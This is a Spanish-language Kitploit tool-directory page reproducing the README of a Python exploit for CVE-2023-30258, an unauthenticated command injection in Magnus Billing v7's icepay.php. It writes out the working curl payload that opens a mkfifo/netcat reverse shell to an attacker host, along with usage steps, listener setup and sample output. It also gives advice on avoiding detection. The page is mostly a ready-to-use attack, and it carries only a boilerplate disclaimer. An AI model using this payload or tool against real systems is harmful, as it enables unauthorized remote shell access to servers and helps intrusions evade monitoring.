Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit | Kitploit
Herramientas/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
71hace 1 añoAún no revisado

Exploit del Sistema Magnus Billing v7

Este script de Python automatiza la explotación de una vulnerabilidad de inyección de comandos en Magnus Billing System v7, específicamente en el script icepay.php ubicado en /mbilling/lib/icepay/icepay.php. El exploit aprovecha el parámetro democ para ejecutar comandos arbitrarios en el sistema objetivo, estableciendo finalmente una reverse shell hacia una máquina controlada por el atacante.

Descripción General de la Vulnerabilidad

La vulnerabilidad permite la inyección de comandos sin autenticación mediante una solicitud GET manipulada. El proof-of-concept (PoC) original utilizaba el siguiente comando curl:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

Este script automatiza ese proceso, haciéndolo configurable mediante argumentos de línea de comandos.

Características

  • Configurable: Especifica la IP del objetivo, la IP del atacante y el puerto mediante argumentos de línea de comandos
  • Sencillo: Utiliza la librería requests para enviar la solicitud HTTP con el payload
  • Retroalimentación: Proporciona una salida clara para realizar un seguimiento del progreso del exploit

Requisitos Previos

  • Python 3.x: Asegúrate de tener Python 3 instalado en tu sistema
  • Librería Requests: Instala el módulo de Python requests:
    root@kitploit:~
    pip install requests
    
  • Netcat: El sistema objetivo debe tener netcat (nc) instalado para que la reverse shell funcione
  • Listener: Configura un listener de netcat en la máquina del atacante para capturar la reverse shell
  • Objetivo vulnerable: El objetivo debe estar ejecutando Magnus Billing System v7 con el script vulnerable icepay.php accesible

Uso

Configuración

  1. Clonar o Descargar: Guarda el script como exploit.py
  2. Configurar el Listener: En tu máquina atacante, inicia un listener de netcat:
    root@kitploit:~
    nc -lvnp <PORT>
    
    Reemplaza <PORT> con el puerto que elijas (por ejemplo, 443)

Ejecutando el Exploit

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

Parámetros:

  • -t, --target: Dirección IP del sistema Magnus Billing objetivo
  • -a, --attacker: Tu dirección IP para recibir la reverse shell
  • -p, --port: Puerto en tu máquina para la reverse shell

Ejemplo

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

Salida Esperada:

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. Captura la Shell: Cambia a tu listener de netcat para interactuar con la reverse shell si tiene éxito

Notas Técnicas

  • Tipo de Payload: El script utiliza una reverse shell basada en FIFO (mkfifo) con netcat
  • Manejo de Errores: Se incluyen comprobaciones básicas para errores de red y puertos no válidos
  • Depuración: Para inspeccionar la respuesta del servidor, descomenta print(response.text) en la función exploit()
  • Payloads Alternativos: El script puede modificarse para utilizar diferentes payloads de reverse shell si es necesario

Solución de Problemas

  • Si la conexión falla, verifica que:
    • El sistema objetivo tenga netcat instalado
    • Ningún firewall esté bloqueando la conexión
    • Se estén utilizando los puertos correctos
    • El objetivo no haya sido parcheado

Consideraciones de Seguridad

  • Considera usar túneles SSH o una VPN al utilizar este exploit para evitar la detección
  • El payload podría activar sistemas de monitoreo de seguridad

Descargo de Responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad. Úsala solo en sistemas en los que tengas permiso explícito para realizar pruebas. El uso no autorizado contra sistemas que no poseas o para los que no tengas consentimiento es ilegal y poco ético. El autor no se hace responsable del mal uso o de los daños causados por este script.

Licencia

Este proyecto se publica bajo la Licencia MIT. Puedes modificarlo y distribuirlo libremente según sea necesario, manteniendo intacto el descargo de responsabilidad.

Contribuciones

Las contribuciones, los informes de errores y las solicitudes de funciones son bienvenidos. No dudes en enviar un pull request o abrir un issue.

Descargar herramienta